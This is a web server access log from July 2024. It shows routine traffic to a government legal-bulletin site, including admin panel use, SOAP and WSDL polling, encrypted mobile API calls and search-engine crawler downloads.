186.98.82.173 - - [04/Jul/2024:08:11:15 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX198Ug1bDdeu9ugG/0P9XPPIUx+raL6PxkCCjaaIcXDLQEsIDLy80y7vhzLV+BR57UGmzsgoBFk2DHAtyoXvkaBCbGhfOTJat4clMEbyIM343u0mVNFk7uOwY8JluHMm2BFHMF2LxuRI/pai1Yc+jxxS4JRfpGtXl+Be3T1sq4L0nVNWZZ7OkM0fZ+ZdWB1TBEMPvqFlWKkA61f0qZZcZER/Y5uxWPwKh1Y=&u=U2FsdGVkX18GSSV01cDUhGUNSzfdXWDG+OwZTwgfvRh8eZWmTs0LQYMsA6c1Y+5G&y=U2FsdGVkX1+YcoNpYgvsCzbumZ3FJ368VPJJMnj7GtMddJd8+Wyh2atgm4nMKA9r HTTP/1.1" 200 26
186.98.82.173 - - [04/Jul/2024:08:11:15 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1/LYn+CIVl1Virojv1Uqt6v2lz9GAwdLcEsplMxo53bYh+PRZdHOPh/1WwULD28oUEW6mDqIE+GeQl4MJkePHi0hAfEGnWg7pwm8+Z7LdeISfd4aPfrUpf1PEDZ0vhdqZXVbhuIN5GTnSE+VQ29JJqegmO7aPkQo/g2hDK8HP/IrzjWy9N4XXvjPMXhY9lwOT9vlWzNjv2VrQ==&u=U2FsdGVkX18GSSV01cDUhGUNSzfdXWDG+OwZTwgfvRh8eZWmTs0LQYMsA6c1Y+5G&y=U2FsdGVkX1+YcoNpYgvsCzbumZ3FJ368VPJJMnj7GtMddJd8+Wyh2atgm4nMKA9r HTTP/1.1" 200 26
186.98.82.173 - - [04/Jul/2024:08:11:15 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1/7K6v17h/HLkhAautg9kJMDk3+BhZmfM8DOvy6/jERjiVJWZexjNiD/G7aG5oJamxX5Yl409LT7T16qciQzqseZXlWJ8+QT8seZR/oB+1QPXo4tR8Ej1gtZUPzIxkBaDTcl8SaXQrcXbazIADay0k/LpjO0ufpe9k2TGRp61hEco4IVHAHp0Usea9HaJF2hfHx39ZMQhDTdg==&u=U2FsdGVkX18GSSV01cDUhGUNSzfdXWDG+OwZTwgfvRh8eZWmTs0LQYMsA6c1Y+5G&y=U2FsdGVkX1+YcoNpYgvsCzbumZ3FJ368VPJJMnj7GtMddJd8+Wyh2atgm4nMKA9r HTTP/1.1" 200 26
186.98.82.173 - - [04/Jul/2024:08:11:16 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1/yIHgI94y4jWxE2X3RuyRtuFpz4IDFTHIIaDi7cG85DauF7el6I6YAasO2DgVaMX7W3qkeDuspsEEvQUN1A5zM8VwZQzGZI75xcVVqhuUBXLMviHoSzTcM+cMwrsIF2qf7IcZlaDDG8QBjYHY/c+urlD0otuKBYahbI2FkNjOA6a8iQNSsZdppbRKv7Lmt9oNouiDOJiO7tQ==&u=U2FsdGVkX18GSSV01cDUhGUNSzfdXWDG+OwZTwgfvRh8eZWmTs0LQYMsA6c1Y+5G&y=U2FsdGVkX1+YcoNpYgvsCzbumZ3FJ368VPJJMnj7GtMddJd8+Wyh2atgm4nMKA9r HTTP/1.1" 200 26
201.245.192.253 - - [04/Jul/2024:08:11:30 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [04/Jul/2024:08:11:41 -0500] "GET /BLA/boletinlegal/admin/ HTTP/1.1" 200 2324
172.22.2.4 - - [04/Jul/2024:08:11:41 -0500] "GET /BLA/boletinlegal/admin/index_files/style.css HTTP/1.1" 200 6223
172.22.2.4 - - [04/Jul/2024:08:11:41 -0500] "GET /BLA/boletinlegal/admin/images/bg.png HTTP/1.1" 200 332965
172.22.2.4 - - [04/Jul/2024:08:11:41 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1320
172.22.2.4 - - [04/Jul/2024:08:11:49 -0500] "POST /BLA/boletinlegal/admin/usuarios/process.php HTTP/1.1" 302 -
172.22.2.4 - - [04/Jul/2024:08:11:49 -0500] "GET /BLA/boletinlegal/BLA/boletinlegal/admin/index.php HTTP/1.1" 404 1320
172.22.2.4 - - [04/Jul/2024:08:11:51 -0500] "GET /BLA/boletinlegal/admin/ HTTP/1.1" 200 5695
201.245.192.253 - - [04/Jul/2024:08:12:12 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.245.221.92 - - [04/Jul/2024:08:12:13 -0500] "HEAD / HTTP/1.1" 200 -
173.252.107.2 - - [04/Jul/2024:08:12:22 -0500] "GET /postulate-al-programa-de-mujeres-por-el-cambio-climatico-en-bogota.html HTTP/1.1" 200 856
173.252.107.11 - - [04/Jul/2024:08:12:22 -0500] "GET /postulate-al-programa-de-mujeres-por-el-cambio-climatico-en-bogota.html HTTP/1.1" 200 856
172.22.2.4 - - [04/Jul/2024:08:11:59 -0500] "GET /BLA/boletinlegal/admin/ HTTP/1.1" 200 5695
172.22.2.4 - - [04/Jul/2024:08:12:25 -0500] "GET /BLA/boletinlegal/admin/index_files/3_5.gif HTTP/1.1" 200 1633
172.22.2.4 - - [04/Jul/2024:08:12:25 -0500] "GET /BLA/boletinlegal/images/can.png HTTP/1.1" 200 37574
172.22.2.4 - - [04/Jul/2024:08:12:25 -0500] "GET /BLA/boletinlegal/admin/index_files/7_1.gif HTTP/1.1" 200 1455
172.22.2.4 - - [04/Jul/2024:08:12:25 -0500] "GET /BLA/boletinlegal/admin/index_files/header.png HTTP/1.1" 200 240212
172.22.2.4 - - [04/Jul/2024:08:12:25 -0500] "GET /BLA/boletinlegal/admin/index_files/7_5.gif HTTP/1.1" 200 1565
172.22.2.4 - - [04/Jul/2024:08:12:25 -0500] "GET /BLA/boletinlegal/admin/index_files/2_2.gif HTTP/1.1" 200 1728
172.22.2.4 - - [04/Jul/2024:08:12:25 -0500] "GET /BLA/boletinlegal/admin/index_files/2_4.gif HTTP/1.1" 200 1763
172.22.2.4 - - [04/Jul/2024:08:12:25 -0500] "GET /BLA/boletinlegal/admin/index_files/index_files/tback.gif HTTP/1.1" 404 1362
201.245.192.253 - - [04/Jul/2024:08:12:30 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [04/Jul/2024:08:10:58 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [04/Jul/2024:08:12:43 -0500] "GET /BLA/boletinlegal/admin/actos/ingresar.php HTTP/1.1" 200 7210
172.22.2.4 - - [04/Jul/2024:08:12:43 -0500] "GET /BLA/boletinlegal/admin/js/nicEdit-latest.js HTTP/1.1" 200 38373
172.22.2.4 - - [04/Jul/2024:08:12:43 -0500] "GET /BLA/boletinlegal/admin/js/jquery-1.3.1.min.js HTTP/1.1" 200 55272
172.22.2.4 - - [04/Jul/2024:08:12:43 -0500] "GET /BLA/boletinlegal/admin/js/jquery.functions.js HTTP/1.1" 200 2317
172.22.2.4 - - [04/Jul/2024:08:12:43 -0500] "GET /BLA/boletinlegal/admin/css/default.css HTTP/1.1" 200 4379
172.22.2.4 - - [04/Jul/2024:08:12:43 -0500] "GET /BLA/boletinlegal/admin/img/h1.png HTTP/1.1" 200 3227
172.22.2.4 - - [04/Jul/2024:08:12:43 -0500] "GET /BLA/boletinlegal/admin/img/overlay.png HTTP/1.1" 200 984
172.22.2.4 - - [04/Jul/2024:08:12:44 -0500] "GET /BLA/boletinlegal/images/favicon.ico HTTP/1.1" 404 1356
172.22.2.4 - - [04/Jul/2024:08:13:13 -0500] "POST /BLA/boletinlegal/admin/actos/ingresar.php HTTP/1.1" 200 7303
217.218.39.138 - - [04/Jul/2024:08:13:21 -0500] "GET / HTTP/1.0" 200 319
201.245.192.253 - - [04/Jul/2024:08:13:30 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [04/Jul/2024:08:11:58 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [04/Jul/2024:08:13:55 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 38712
207.46.13.125 - - [04/Jul/2024:08:13:54 -0500] "GET /appsia/controlador HTTP/1.1" 200 4799
201.245.192.253 - - [04/Jul/2024:08:14:12 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [04/Jul/2024:08:14:13 -0500] "POST /BLA/boletinlegal/admin/actos/ingresar.php HTTP/1.1" 200 7303
201.245.192.253 - - [04/Jul/2024:08:14:30 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [04/Jul/2024:08:15:11 -0500] "POST /BLA/boletinlegal/admin/actos/ingresar.php HTTP/1.1" 200 7303
201.245.192.253 - - [04/Jul/2024:08:15:30 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [04/Jul/2024:08:14:02 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [04/Jul/2024:08:16:10 -0500] "POST /BLA/boletinlegal/admin/actos/ingresar.php HTTP/1.1" 200 7303
201.245.192.253 - - [04/Jul/2024:08:16:12 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [04/Jul/2024:08:16:30 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [04/Jul/2024:08:14:52 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57889
172.22.2.4 - - [04/Jul/2024:08:16:58 -0500] "GET /BLA/boletinlegal/normativa.php HTTP/1.1" 200 8397
172.22.2.4 - - [04/Jul/2024:08:17:11 -0500] "POST /BLA/boletinlegal/admin/actos/ingresar.php HTTP/1.1" 200 7303
216.245.221.92 - - [04/Jul/2024:08:17:13 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [04/Jul/2024:08:17:30 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [04/Jul/2024:08:17:30 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/CUADRO%20ANALISIS%20SENTENCIA%20T-411%20DE%201992.doc HTTP/1.1" 304 -
201.245.192.253 - - [04/Jul/2024:08:16:45 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39159
201.245.192.253 - - [04/Jul/2024:08:17:45 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 35001
172.22.2.4 - - [04/Jul/2024:08:18:07 -0500] "POST /BLA/boletinlegal/admin/actos/ingresar.php HTTP/1.1" 200 7303
40.77.167.126 - - [04/Jul/2024:08:18:08 -0500] "GET /BLA/resoluciones/AUTOS%202023/3056.pdf HTTP/1.1" 304 -
201.245.192.253 - - [04/Jul/2024:08:18:12 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
66.249.73.36 - - [04/Jul/2024:08:18:19 -0500] "GET /BLA/resoluciones/AUTOS%202018/3151.pdf HTTP/1.1" 200 1085045
200.118.80.65 - - [04/Jul/2024:08:18:21 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/7690.pdf HTTP/1.1" 206 1
200.118.80.65 - - [04/Jul/2024:08:18:21 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/7690.pdf HTTP/1.1" 206 98936
201.245.192.253 - - [04/Jul/2024:08:18:30 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.73.36 - - [04/Jul/2024:08:18:41 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202004/RES%202004%20951-1000/00000976.tif HTTP/1.1" 200 75760
201.245.192.253 - - [04/Jul/2024:08:18:54 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 38712
201.245.192.253 - - [04/Jul/2024:08:19:01 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 33639
172.22.2.4 - - [04/Jul/2024:08:19:09 -0500] "POST /BLA/boletinlegal/admin/actos/ingresar.php HTTP/1.1" 200 7303
201.245.192.253 - - [04/Jul/2024:08:19:30 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.102.8.161 - - [04/Jul/2024:08:19:33 -0500] "GET /Residuos/textiles/files/guia_textiles.pdf HTTP/1.1" 200 12356716
201.245.192.253 - - [04/Jul/2024:08:19:47 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 35001
172.22.2.4 - - [04/Jul/2024:08:20:08 -0500] "POST /BLA/boletinlegal/admin/actos/ingresar.php HTTP/1.1" 200 7303
201.245.192.253 - - [04/Jul/2024:08:20:12 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [04/Jul/2024:08:20:30 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [04/Jul/2024:08:21:04 -0500] "POST /BLA/boletinlegal/admin/actos/ingresar.php HTTP/1.1" 200 7303
201.245.192.253 - - [04/Jul/2024:08:21:30 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [04/Jul/2024:08:19:52 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [04/Jul/2024:08:22:02 -0500] "POST /BLA/boletinlegal/admin/actos/ingresar.php HTTP/1.1" 200 7303
201.245.192.253 - - [04/Jul/2024:08:22:12 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.245.221.92 - - [04/Jul/2024:08:22:13 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [04/Jul/2024:08:20:43 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57889
201.245.192.253 - - [04/Jul/2024:08:22:30 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
186.102.2.64 - - [04/Jul/2024:08:22:42 -0500] "GET /kwssiamovil/sm/ldap/au?x=U2FsdGVkX19kasCznXhlBgXVVB0IsxNiYICz3sQ/1pXknk/rBCjkdZnxwQdRf85S&y=U2FsdGVkX1/nbWFBY6Ae3iiq7Jnp2foE5v20DrFWnaQ= HTTP/1.1" 200 30
